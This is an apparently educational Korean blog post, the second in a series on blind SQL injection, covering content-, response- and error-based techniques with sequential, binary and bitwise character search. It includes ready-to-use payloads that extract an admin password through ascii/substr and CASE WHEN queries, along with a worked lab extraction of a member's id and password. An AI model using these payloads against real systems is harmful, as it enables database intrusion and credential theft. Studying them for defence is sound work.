์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

Blind Injection -2

  • -
๋ฐ˜์‘ํ˜•

1. ์›น์‚ฌ์ดํŠธ ์ž์ฒด ์—๋Ÿฌ ํŽ˜์ด์ง€๊ฐ€ ๋œจ์ง€ ์•Š์„ ๋•Œ

2. ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์‘๋‹ต์ด ์•„๋‹Œ ์„œ๋ฒ„ ์‘๋‹ต์œผ๋กœ ๋‚˜์˜ฌ ๋•Œ

3. Order by์ ˆ์ด ๋ถˆ๊ฐ€๋Šฅํ•  ๋•Œ

 

๋‹ค์–‘ํ•œ Blind ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•

Content Blind (๊ธฐ์ค€๋ฌธ์ž)

Response Blind (์‘๋‹ต๋ฉ”์„ธ์ง€)

 

๋‹ค์–‘ํ•œ Blind ํƒ์ƒ‰ ๊ธฐ๋ฒ•

์ˆœ์ฐจ ํƒ์ƒ‰

์ด์ง„ ํƒ์ƒ‰

๋น„ํŠธ์—ฐ์‚ฐ ํƒ์ƒ‰

 

Blind ๊ณต๊ฒฉ

ํ•ต์‹ฌ์€ ์„œ๋ฒ„์˜ ์ฐธ๊ณผ ๊ฑฐ์ง“์˜ ์‘๋‹ต์„ ๊ฐ€์ง€๊ณ  ํŒ๋ณ„

Content Based ๊ฒŒ์‹œํŒ ์ž์ฒด์—์„œ ์ฐธ/๊ฑฐ์ง“์„ ํŒ๋ณ„ํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐ์ดํ„ฐ๊ฐ€ ์žˆ๋Š” ๊ฒฝ์šฐ

ex) test๋ผ๋Š” ๊ธฐ์ค€๋ฌธ์ž๋ฅผ ๊ฐ€์ง€๊ณ  ๊ฒ€์ƒ‰์„ ํ•˜์˜€์„ ๋•Œ

์ฐธ : test๊ฐ€ ํฌํ•จ๋œ ๊ตฌ๋ฌธ์ด ์ถœ๋ ฅ

๊ฑฐ์ง“ : ์•„๋ฌด ๋ฌธ์ž๋„ ์ถœ๋ ฅ์ด ๋˜์ง€ ์•Š์Œ

 

Response Based

์„œ๋ฒ„์˜ ์‘๋‹ต์‚ฌ์ด์ฆˆ๋ฅผ ๋ณด๊ณ  ๊ฒฐ์ •

์ฐธ : ๊ฒŒ์‹œ๊ธ€์ด ์กด์žฌํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค

๊ฑฐ์ง“ : ํŽ˜์ด์ง€ ์—๋Ÿฌ ์•ˆ๋‚ด

 

Time Based

์–ด๋– ํ•œ ์ƒํ™ฉ์—์„œ๋„ ์ฐธ/๊ฑฐ์ง“์„ ํŒ๋ณ„ํ•  ์ˆ˜ ์—†๊ณ ,

์‘๋‹ต๊ฐ’๋„ ์—†์„ ๊ฒฝ์šฐ ๋„คํŠธ์›Œํฌ ํŠธ๋ž˜ํ”ฝ์„ ์ด์šฉํ•˜์—ฌ ๊ฐ•์ œ๋กœ ์ฐธ/๊ฑฐ์ง“์„ ํŒ๋ณ„

์ฐธ : ๊ฒŒ์‹œ๊ธ€์ด ์กด์žฌํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค

๊ฑฐ์ง“ : 5~10์ดˆ ์ •๋„ ์ง€์—ฐ์‹œ๊ฐ„์ด ๋ฐœ์ƒ ํ›„ ๊ฒฐ๊ณผ ์ถœ๋ ฅ

์‹œ๊ฐ„์ ์œผ๋กœ ๊ฐ€์žฅ ์˜ค๋ž˜๊ฑธ๋ฆฌ๋Š” ๊ณต๊ฒฉ ๊ธฐ๋ฒ• ์ค‘ ํ•˜๋‚˜

 

ํƒ์ƒ‰ ๋ฐฉ๋ฒ•

์ˆœ์ฐจ ํƒ์ƒ‰

1~10, a~z, A~Z ... ํŠน์ˆ˜๋ฌธ์ž ํฌํ•จ

ํ•˜๋‚˜์”ฉ ๋Œ€์ž…ํ•˜์—ฌ ํƒ์ƒ‰ ๊ธฐ๋ฒ• ์™„์„ฑ

 

์ด์ง„ ํƒ์ƒ‰

 0 1 2 3 4 5 6 7 8 9

a b c d e f g h i j k l m n o p q r s t u v w x y z

A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

! @ # $ % ^ & * ( ) - _ = + ' ~ [ ] { } < > ? / \ |

 

ASCII ์ฝ”๋“œ

33 ~ 126๊นŒ์ง€ ์•„์Šคํ‚ค ์ฝ”๋“œ ๊ฐ’์„ ๋ถ€์—ฌ

80๋ถ€ํ„ฐ ์‹œ์ž‘์ด ๊ฐ€์šด๋ฐ๋ถ€ํ„ฐ ์‹œ์ž‘์ด๊ฒ ์ง€๋งŒ, ๋ณดํ†ต 97(a)๋ถ€ํ„ฐ ์‹œ์ž‘

 

'board'๋ผ๋Š” ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์˜ 'members'๋ผ๋Š” ํ…Œ์ด๋ธ”์—์„œ

'id'๊ฐ€ 'admin'์ธ 'password'์นผ๋Ÿผ์˜ '์ฒซ'๋ฌธ์ž์˜ '์•„์Šคํ‚ค์ฝ”๋“œ'๊ฐ€ '80'๋ณด๋‹ค 'ํฐ'๊ฐ€์š” ?

adminํŒจ์Šค์›Œ๋“œ๊ฐ€ @dmin์ด๋ผ๊ณ  ํ•œ๋‹ค๋ฉด

SELECT ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))>80

1. SELECT password FROM board.members WHERE id='admin' > @dmin

2. substr,1,1 + @dmin ==> @

3. ascii(@) ==> 64

4. 64>80

5. ๊ฑฐ์ง“

SELECT ascii('a')		# ๋ฌธ์ž๋ฅผ ์ˆซ์ž๋กœ ๋ณ€ํ™˜
SELECT char('97')		# ์ˆซ์ž๋ฅผ ๋ฌธ์ž๋กœ ๋ณ€ํ™˜

 

members ํ…Œ์ด๋ธ”์—์„œ ์ƒˆ๋กœ์šด ๋ฐ์ดํ„ฐ๋ฅผ ์ถ”๊ฐ€ํ•˜์˜€์Šต๋‹ˆ๋‹ค.

Content Blind๋ฅผ ํ†ตํ•ด์„œ ์ถ”๊ฐ€๋œ ํšŒ์›์˜ ์ •๋ณด๋ฅผ ์ถ”์ถœํ•˜์„ธ์š”

id ascii๊ฐ’์ด ๋งž์„ ๊ฒฝ์šฐ 1 match๋กœ ๋œฌ๋‹ค
id ascii๊ฐ’์ด ํ‹€๋ฆด ๊ฒฝ์šฐ 0 match๋กœ ๋œฌ๋‹ค

ascii(substr((SELECT id FROM board.members WHERE idx=6),1,1))=108
ascii(substr((SELECT id FROM board.members WHERE idx=6),2,1))=101
ascii(substr((SELECT id FROM board.members WHERE idx=6),3,1))=101
ascii(substr((SELECT id FROM board.members WHERE idx=6),4,1))=106
ascii(substr((SELECT id FROM board.members WHERE idx=6),5,1))=105
ascii(substr((SELECT id FROM board.members WHERE idx=6),6,1))=101
ascii(substr((SELECT id FROM board.members WHERE idx=6),7,1))=117
ascii(substr((SELECT id FROM board.members WHERE idx=6),8,1))=110

ascii(substr((SELECT password FROM board.members WHERE idx=6),1,1))=103

 

 

0x21 =>33    0010 0001         

> ์•„์Šคํ‚ค ์ฝ”๋“œ๋Š” ๋ฌด์กฐ๊ฑด 7bit

0x7e =>126  0111 1110

 

ascii('d') = 100 = 110 0100

์ฒซ ๋ฒˆ์งธ ์ž๋ฆฌ๋ฅผ 1bit์™€ ANDํ•˜๋ฉด 1์ธ๊ฐ€์š” ?

๋‘ ๋ฒˆ์งธ ์ž๋ฆฌ๋ฅผ 1bit์™€ ANDํ•˜๋ฉด 1์ธ๊ฐ€์š” ?

์„ธ ๋ฒˆ์งธ ์ž๋ฆฌ๋ฅผ 1bit์™€ ANDํ•˜๋ฉด 1์ธ๊ฐ€์š” ?

๋„ค ๋ฒˆ์งธ ์ž๋ฆฌ๋ฅผ 1bit์™€ ANDํ•˜๋ฉด 1์ธ๊ฐ€์š” ?

๋‹ค์„ฏ ๋ฒˆ์งธ ์ž๋ฆฌ๋ฅผ 1bit์™€ ANDํ•˜๋ฉด 1์ธ๊ฐ€์š” ?

์—ฌ์„ฏ ๋ฒˆ์งธ ์ž๋ฆฌ๋ฅผ 1bit์™€ ANDํ•˜๋ฉด 1์ธ๊ฐ€์š” ?

์ผ๊ณฑ ๋ฒˆ์งธ ์ž๋ฆฌ๋ฅผ 1bit์™€ ANDํ•˜๋ฉด 1์ธ๊ฐ€์š” ?

 

110 0110 

xxx xxx0

           1

----------------- and์—ฐ์‚ฐ

           0

 

xxx xx1x

          10

-----------------and์—ฐ์‚ฐ

         1

 

xxx x1xx

         100

------------------and์—ฐ์‚ฐ

     1

 

'board'๋ผ๋Š” ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์˜ 'members' ํ…Œ์ด๋ธ”์—์„œ 'id'๊ฐ€ 'admin'์ธ 'password'์ปฌ๋Ÿผ์˜

์ฒซ ๋ฌธ์ž์˜ ์•„์Šคํ‚ค ์ฝ”๋“œ ๊ฐ’์„ 1๊ณผ and ๋น„ํŠธ ์—ฐ์‚ฐ์„ ํ•˜๋ฉด 1๊ณผ ๊ฐ™๋‚˜์š”?

SELECT ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&1=1

์ž๋ฆฌ์ˆ˜ ๊ณ„์‚ฐํ•˜๊ธฐ

0100 0000 & 0000 0010 == 1?

ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&1=1	# ๊ฑฐ์ง“ : 0

0100 0000 & 0000 0100 == 1?

0100 0000 & 0000 1000 == 1?

ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&2=1	๊ฑฐ์ง“ : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&4=4	๊ฑฐ์ง“ : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&8=8	๊ฑฐ์ง“ : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&16=16	๊ฑฐ์ง“ : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&32=32	๊ฑฐ์ง“ : 0
ascii(substr((SELECT password FROM board.members WHERE id='admin'),1,1))&64=64	์ฐธ : 1

0100 0000 > @

ctrl + u๋กœ ์ธ์ฝ”๋”ฉ ํ•œ ํ›„ ๊ฒฐ๊ณผ ํ™•์ธ

'admin' ๋น„๋ฐ€๋ฒˆํ˜ธ ์ฐพ๊ธฐ

110 0100 >> 10์ง„์ˆ˜๋กœ ๋ณ€๊ฒฝ : 100

SELECT char(100) : d

 

gugucon์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์•Œ์•„๋ณด์ž

1. ๋น„๋ฐ€๋ฒˆํ˜ธ ๊ฐฏ์ˆ˜ ์•Œ์•„๋ณด๊ธฐ

๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ 5๊ธ€์ž๋ผ๋Š”๊ฒƒ์„ ์•Œ๊ฒŒ๋๋‹ค.
011 1001 > gugucon์˜ ์ฒซ๋ฒˆ์งธ ๋น„๋ฐ€๋ฒˆํ˜ธ
011 1001 ( 57 ) > 9
011 1001 > gugucon์˜ ๋‘๋ฒˆ์งธ ๋น„๋ฐ€๋ฒˆํ˜ธ
011 1001 ( 57 ) > 9
110 0011 > gugucon์˜ ์„ธ๋ฒˆ์งธ ๋น„๋ฐ€๋ฒˆํ˜ธ
110 0011 ( 99 ) > c
011 0000 > gugucon์˜ ๋„ค๋ฒˆ์งธ ๋น„๋ฐ€๋ฒˆํ˜ธ
011 0000 (48) > 0
110 1110 > gugucon์˜ ๋‹ค์„ฏ๋ฒˆ์งธ ๋น„๋ฐ€๋ฒˆํ˜ธ
110 1110 ( 110 ) > n
๋น„๋ฐ€๋ฒˆํ˜ธ ์ถ”์ถœ ์„ฑ๊ณต

 

 

Response Blind Based

>> ์„œ๋ฒ„์˜ ์‘๋‹ต๊ฐ’์˜ ์šฉ๋Ÿ‰

400 // 200 // 500

404 : not found

200 : OK 

501 : GATEWAY - ์„œ๋ฒ„ ์—๋Ÿฌ

 

CASE WHEN ๊ตฌ๋ฌธ์„ ์‚ฌ์šฉํ•ด์„œ ๋™์ž‘ == if ๋ฌธ

if(์กฐ๊ฑด){ ์ฐธ }

else{๊ฑฐ์ง“}

 

CASE WHEN ์กฐ๊ฑด THEN ์ฐธ ELSE ๊ฑฐ์ง“ END

SELECT CASE WHEN 1=1 THEN (SELECT 1) ELSE (SELECT 2) END;

SELECT CASE WHEN 1=1 THEN (SELECT 'TRUE') ELSE (SELECT 'FALSE') END;

RESPONSE๊ฐ€ ํƒ€ ๋ธ”๋ผ์ธ๋“œ๋ณด๋‹ค ๊นŒ๋‹ค๋กœ์šด์ 

๋ฐ˜๋“œ์‹œ ๊ตฌ๋ฌธ ์—๋Ÿฌ๊ฐ€ ์—†์–ด์•ผํ•œ๋‹ค

 

DBMS์— SQL ์ฟผ๋ฆฌ๋ฌธ์„ ์ž…๋ ฅ

"SELECT * FROM table" ์ด๋ผ๋Š” SQL ๊ตฌ๋ฌธ์„ ์ž…๋ ฅํ•˜์˜€์„ ๋•Œ

1. DBMS๊ฐ€ ๊ตฌ๋ฌธ ๋ถ„์„ > ๋ฌธ๋ฒ•์— ์˜ค๋ฅ˜๊ฐ€ ์žˆ๋Š”๊ฐ€ ? , ์ž๋ฃŒํ˜•์ด ์ž˜ ๋งž๋Š”๊ฐ€ ?

2. ์ปดํŒŒ์ผ

3. ์‹คํ–‰ > [์˜ค๋ฅ˜]

๋‹ค์ค‘ ์ฟผ๋ฆฌ ์˜ค๋ฅ˜

๋‚˜๋ˆ„๊ธฐ 0

SELECT CASE WHEN 1=1 THEN 'TRUE' ELSE(SELECT 'a' UNION SELECT 'b') END;

SELECT CASE WHEN 1=1 THEN 'TRUE' ELSE(SELECT 1/0) END;		# TRUE
SELECT CASE WHEN 1=2 THEN 'TRUE' ELSE(SELECT 1/0) END;		# FALSE

'and 1=(CASE WHEN 1=1 THEN 1 ELSE (SELECT 'a' union SELECT 'b') END)#	TRUE
'and 1=(CASE WHEN 1=2 THEN 1 ELSE (SELECT 'a' union SELECT 'b') END)#	FALSE

์™ผ์ชฝ ( ์ฐธ ) // ์˜ค๋ฅธ์ชฝ ( ์‹คํŒจ )

 

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Oracle database ๊ณต๊ฒฉ ์‹ค์Šต  (0) 2022.07.05
ORACLE INJECTION  (0) 2022.07.05
Blind Injection -1  (0) 2022.07.01
oracle ํ™˜๊ฒฝ ์„ค์ •  (0) 2022.06.30
UNION SQL INJECTION  (0) 2022.06.30
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.